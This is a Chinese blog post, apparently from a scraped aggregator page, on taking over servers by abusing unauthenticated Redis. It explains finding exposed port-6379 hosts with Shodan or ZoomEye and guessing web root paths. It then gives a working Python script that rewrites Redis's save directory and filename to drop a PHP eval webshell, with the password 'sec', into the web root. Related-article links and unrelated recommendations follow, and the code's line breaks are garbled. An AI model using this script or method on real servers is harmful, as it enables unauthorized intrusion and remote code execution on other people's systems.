Redis默认端口是6379,可以通过zoomeye或者shodan来查找开放6379的端口,能收到很多对外开放6379端口的ip,而且绝大部门是未授权访问的,因为默认redis是未授权访问。但是还有一先决条件是该ip开放web服务,也就是开放如常见的80端口等,满足这两个条件你就有可能getshell。但是还有最麻烦的一件事是,你必须要知道网站web路径。这边只能靠网站报错泄漏路径,phpinfo文件为删除,文件包含漏洞等,不然只能靠猜了,比如iis服务器的路径c:/inetpub/wwwroot等,linux服务器/var/www, /var/www/html等。

  • 可以用redis-cli客户端连上redis服务器
  • 然后可以用info验证是否有信息
  • 通过设置路径,设置webshell名字和内容getshell

总结一下,redis getshell条件

  • redis可以未授权访问,或者弱口令访问
  • redis服务器还开放了web服务
  • 知道web服务器的路径

以下还有一个redis getshell的脚本

#!/usr/bin/env python

# coding=utf8
# author=Cy3ber http://www.cy3ber.com import redis
import sys def log(text):
print '[*]------' + text def getshell(ip='127.0.0.1', pt=6379, webdir='/var/www/', socket_timeout=10):
try:
r = redis.StrictRedis(host=ip, port=pt)
if r.config_set('dir', webdir) == True and r.config_set('dbfilename', 'safe.php')
== True:
log('set shell on %safe.php sucsessed' % (webdir))
else:
log('set shell dir failed')
sys.exit(1)
if r.set('myshell', "<?php @eval($_POST['sec']);?>") == True:
log('set eval sucsessed')
else:
log('set eval failed')
sys.exit(1)
if r.save() == True:
log('save shell as %safe.php sucsessed password is "sec"'%(webdir))
log('getshell sucsessed please check')
else:
log('getshell failed')
except:
log('error') if __name__ == '__main__':
if len(sys.argv) <> 4:
print "\n+-----------------------------+"
print "| JbossGetshell |"
print "| Cy3ber - cy3ber.com |"
print "| Email:webmaster@cy3ber.com |"
print "+-----------------------------+\n"
print 'Usage:python redisgetshell.py ip port webdir'
print "explame:python redisgetshell.py 10.0.18.1 6379 /data/web/"
sys.exit(1) else:
getshell(ip=sys.argv[1],pt=sys.argv[2],webdir=sys.argv[3])

Redis Getshell总结的更多相关文章

  1. 记一次Redis+Getshell经验分享

    前言: 当我们接到一个授权渗透测试的时候,常规漏洞如注入.文件上传等尝试无果后,扫描端口可能会发现意外收获. 知己知彼乃百战不殆,Redis介绍: 简单来说 redis 就是一个Key-Value类型 ...

  2. SSRF漏洞分析与利用

    转自:http://www.4o4notfound.org/index.php/archives/33/ 前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的 0x01 ...

  3. SSRF-php初探

    0x00 前言 1)    SSRF的概念很好理解,请自行百度. 2)    JAVA/PHP/PYTHON都存在SSRF漏洞(至于其他语言的情况,了解粗浅尚不得知). 3)    SSRF的利用方式 ...

  4. weblogic ssrf 漏洞笔记

    CVE-2014-4210 Oracle WebLogic web server即可以被外部主机访问,同时也允许访问内部主机.比如有一个jsp页面SearchPublicReqistries.jsp, ...

  5. Pikachu靶场SSRF学习

    下载Pikachu靶场:https://github.com/zhuifengshaonianhanlu/pikachu Windows用phpstudy也行,记得要改config.inc文件 打开S ...

  6. ATT&CK系列一 知识点总结

    一.环境搭建1.环境搭建测试2.信息收集二.漏洞利用3.漏洞搜索与利用4.后台Getshell上传技巧5.系统信息收集6.主机密码收集三.内网搜集7.内网--继续信息收集8.内网攻击姿势--信息泄露9 ...

  7. redis未授权访问getshell

    redis未授权访问的问题一年前就爆了,当时刚开始学安全,还不太懂.今天借着工作的机会来搞一把,看看能不能拿下一台服务器.其实前几天就写好了一直想找个实际环境复现一下,一直没有找到,只说下大致思路. ...

  8. Redis主从复制getshell技巧

    Redis未授权漏洞常见的漏洞利用方式: Windows下,绝对路径写webshell .写入启动项. Linux下,绝对路径写webshell .公私钥认证获取root权限 .利用contrab计划 ...

  9. redis未授权getshell的4种方式

    前言 redis未授权漏洞或弱口令一直是很有用的渗透突破口,最近正好闲的无事就拿redis来测试一些,做一个简单的收集,方便自己日后的回顾. 漏洞描述 Redis 默认情况下,会绑定在 0.0.0.0 ...

随机推荐

  1. 未能加载文件或程序集“Renci.SshNet, Version=2016.1.0.0, Culture=neutral, PublicKeyToken=……”

    emmmm~ 这是一个让人烦躁有悲伤的问题~ 背景 我也不知道什么原因,用着用着,正好好的,就突然报了这种问题~ 未能加载文件或程序集“Renci.SshNet, Version=2016.1.0.0 ...

  2. android中的菜单Menu

    Menu是一个接口, 他有2个子接口, SubMenu和ContextMenu; 前者菜单常见于按home键就会出现 ,后者是一个上下文菜单, 一般点击某个条目会在手机屏幕中出现一个类似悬浮窗口的菜单 ...

  3. Android入门学习教程PDF免费下载

    场景 CSDN: https://blog.csdn.net/badao_liumang_qizhi 博客园: https://www.cnblogs.com/badaoliumangqizhi/ 哔 ...

  4. HBase读延迟的12种优化套

    任何系统都会有各种各样的问题,有些是系统本身设计问题,有些却是使用姿势问题.HBase也一样,在真实生产线上大家或多或少都会遇到很多问题,有些是HBase还需要完善的,有些是我们确实对它了解太少. 总 ...

  5. Qt插件热加载-QPluginLoader实现

    上一篇C++消息框架-基于sigslot文章中我们讲述了使用sigslot信号槽实现自己的消息框架,这是一个比较粗糙,而且小的框架.当我们的程序逐渐变大时,我们可能就会考虑功能插件化,或者支持某些模块 ...

  6. Pytorch的基础数据类型

    引言 本篇介绍Pytorch的基础数据类型,判断方式以及常用向量 基础数据类型 torch.Tensor是一种包含单一数据类型元素的多维矩阵. 目前在1.2版本中有9种类型. 同python相比,py ...

  7. [VB.NET Tips]字符串转换为日期

    有些字符串需要转换成日期,或者整型转换为日期,可以参考如下思路: Dim result As Date Dim source As String = "20190515" resu ...

  8. 【linux】【elasticsearch】解决docker pull error pulling image configuration: Get https://d2iks1dkcwqcbx.cloudfront.net/

    网络原因导致的问题: error pulling image configuration: Get https://d2iks1dkcwqcbx.cloudfront.net/docker/regis ...

  9. 品Spring:SpringBoot轻松取胜bean定义注册的“第一阶段”

    上一篇文章强调了bean定义注册占Spring应用的半壁江山.而且详细介绍了两个重量级的注册bean定义的类. 今天就以SpringBoot为例,来看看整个SpringBoot应用的bean定义是如何 ...

  10. vue知识点整理

    1.对于mvvm的理解 mvvm是model-view-viewModel vue是以数据为驱动的,vue自身将dom和数据进行绑定,一旦创建绑定,dom和数据将保持同步,每当数据发生变化,dom也会 ...